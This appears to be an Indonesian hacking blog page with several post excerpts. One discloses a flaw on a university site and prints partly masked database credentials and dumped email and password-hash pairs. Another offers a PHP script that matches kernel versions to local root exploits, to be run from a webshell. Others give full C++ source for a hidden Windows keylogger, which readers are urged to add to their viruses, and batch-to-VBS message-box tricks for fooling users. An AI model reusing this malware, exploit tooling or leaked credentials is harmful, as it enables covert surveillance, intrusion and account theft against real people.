rsnd.undip.ac.id vulnerability Leaked

Sebuah website yakni undip.ac.id memiliki celah pada ajax.php
dimana mengallow user yang tidak memiliki akses bisa masuk dan melakukan suatu
perintah remote execution ..diantranya adalah



Link : http://rsnd.undip.ac.id/robots.txt

dan juga berapa file config web

/** The name of the database for WordPress */
define('DB_NAME', 'un****s_wp');

/** MySQL database username */
define('DB_USER', 'un****s_wp');

/** MySQL database password */
define('DB_PASSWORD', 'HMOv***');

/** MySQL hostname */
define('DB_HOST', '***********');

* untuk melindungi nama asli

berikut hasil dump

rsnun***@gmail.com:$P$BEli9gCkVK.9LFlIxtYJmqdvuqRjzV0
is**di@live.undip.ac.id:$P$BKLrIpsuwDRpMKbuVLj0cCNzQP3V/L.

READMORE

Root vuln Checker [PHP]

Mau share sedikit kode php ajah yang gunanya buat diteksi suatu
web bisa di tembus pake exploit tipe apa buat dapetin ROOT

oke liat ajah

 
<php
$version_kernel=php_uname('r');
$version=explode('-',$version_kernel);
echo "SystemKernel: ".php_uname('-a')."
";
$exploits = array(  
                'w00t' => '2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4.16','2.4.20',
                'brk' => '2.4.22','2.4.21','2.4.10','2.4.20',
                'elflbl' => '2.4.29',
                'expand_stack' => '2.4.29',
                'h00lyshit' => '2.6.8','2.6.10','2.6.11','2.6.12',
                'kdump' =>  '2.6.13',
                'km2' => '2.4.18','2.4.22',
                'krad' => '2.6.11',
                'krad3' => '2.6.11','2.6.9',
                'local26' =>'2.6.13',
                'mremap_pte'=>'2.4.20','2.2.25','2.4.24',
                'newlocal'=>'2.4.17','2.4.19',
                'ong_bak'=>'2.4.','2.6.',
                'ptrace'=>'2.2.24','2.4.22',
                'ptrace_kmod'=>'2.4.','2.6.',
                'ptrace24'=>'2.4.9',
                'pwned'=>'2.4.','2.6.',
                'py2'=>'2.6.9','2.6.17','2.6.15','2.6.13',
                'raptor_prctl'=>'2.6.13','2.6.17','2.6.16','2.6.13',
                'prctl3'=>'2.6.13','2.6.17','2.6.9',
                'stackgrow2'=>'2.4.29','2.6.10',
                'uselib24'=>'2.4.29','2.6.10','2.4.22','2.4.25',
                'exp.sh'=>'2.6.9','2.6.10','2.6.16','2.6.13',
                'prctl'=>'2.6.',
                'kmdx'=>'2.6.','2.4.'
                );
                $rootexploit = array_search($version[0], $exploits);
                if ($rootexploit==NULL){
                        echo 'RootExploit:Tidak ada RootExploit tersebut pada daftar kami';
                }else{
                        echo 'RootExploit:Coba gunakan'.$rootexploit;
                }
>

souce disave dengan bahasa .php
kemudian tinggal di upload di webshell kalian dan untuk database nya bisa di tambahkan sendiri sesuai kreatifitas anda sekalian
karena ini cuma memvalidasi nomor kernel ajah dan di tampung menjadi array(kumpulan) sekian.

READMORE

Manipulasi Msgbox melalui vbs

Pasti semua tau kan visual basic script atau biasanya yg
file berekstensi .vbs???
dimana ini file di jalanin melauli wscript.exe
nah biasanya para virus maker itu lebih suka membuat worm mengunakan ini

karena kelebihan source ini ketika di exekusi dia tidak melihatkan dirinya kalau sedang running
jadi diem2 menghanyutkan  :o

nah untuk sekrang ane cuma mau nge share tentang msgbox ajah yg biasa di pakai virus atau worm untuk ngelabui usernya

Pada kasus ini saya mencoba membuat 3 tipe
pesan error,yaitu :

1.Exclamation
2.Error
3.info

untuk menulisnya kita mengunakan fariasi berupa vbs script

nah kita coba untuk pesan Exclamation

echo off
cls
echo x=msgbox("Judul Pesan",vbExclamation or vbOkOnly,"Tulis Pesan") >>pesan.vbs
start "" "pesan.vbs"

nah kita coba untuk pesan Error

echo off
cls
echo x=msgbox("Judul Pesan",vbCritical or vbOkOnly,"Tulisan Pesan") >>pesan.vbs
start "" "pesan.vbs"

nah kita coba untuk pesan Info

echo off
cls
echo x=masgbox("Judul Pesan",vbInformation or vbOkOnly,"Tulis Pesan") >>pesan.vbs
start "" "pesan.vbs"

pengalan code diatas itu kita save menjadi batchfile jadi disave jadi .bat
bukan .vbs kenpaa??
karena disini ane gunain tanda " >>" jadi dimana file batch tadi meng create file bernama pesan
dan dengan ekstensi .vbs , setelah di buat file itu di jalankan  ^^ dengan metode sederhana
yaitu start "" "pesan.vbs"

READMORE

Cara mengubah batchfile ke bentuk exe

"Batchfile" atau biasanya di kenal .bat atau .cmd yang biasa di buat di windows
dengan text editor biasa seperti notepad bisa di ubah menjadi .exe alias file execute files

Bagaimana cara meng convert Source ini????

gunakan lah ini

kegunannya untuk

1. Mengenkripsi code agar menghindari penge recode ulang code orang lain
    alias menghindari plagiat /copypaste

2.Bisa membuat password seblum aplikasi ini di jalankan ... jadi tidak sembarang orang menggunakannya

3.Bisa membuat detail programnya dari copyright

4.Bisa memasukan Icon pada aplikasi ini

5.Gratiss aplikasi ini :D

READMORE

Download Dev C++ gratis

 Bagi yang bergelut dengan bahasa pemograman bahasa C , C++
 tidak usah bingung mencari aplikasi dalam pengcodingan.
 gunakan saja "Dev C++" karena software ini portable dan juga gratis,
 lengkap juga dengan compailer pada aplikasinya jadi kita tidak terlalu rumit seperti di Borland

 jika berminat bisa langsung donwload disini

READMORE

Membuat keyloger dari bahasa C

Bagi yang suka memakai "keyloger" buatan orang . . .

pernahkah kalian mencoba untuk membuatnya???
menurut saya ada banyak bahasa pemograman yang bisa di gunakan untuk membuat sebuah
program ini misalnya vb6 , C , C++ , atau sebagainya

dalam kesempatan ini saya akan menshare dalam membuatnya
yang di butuhkan

aplikasi Devcpp
bagi yang belum memilikinya bisa donwload di sini


Untuk code nya bisa di liat seperti ini

#include 
#include 
#include 
using namespace std;
int Save (int key_stroke, char *file);
void Stealth();

int main()
{
Stealth();
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"C:\WINDOWS\sohai.txt");
}
}
system ("PAUSE");
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
} 

ini masih kurang bagus kalo menurut ane, tapi mayan lah buat pembelajaran
dalam merekam logs,dan bisa di tambahkan ke script virus kalian ^^
disini saya contohkan hasil logs akan tersimpan di drive dengan alamat

C:\WINDOWS\

salah satu kemampuannya adalah ,proses keylog saat di jalankan tidak di tampilkan
alias stealth mirip suluman

silahkan untuk mengembangkan lagi script code ini agar menjadi lebih baik lagi

READMORE

asc.harvard.edu "bugs sqli"

Everyone knows about the Harvard University,or we can acces in http://www.harvard.edu

But this web have subdomain asc . . . i had found this hole in POC with SQLI

READMORE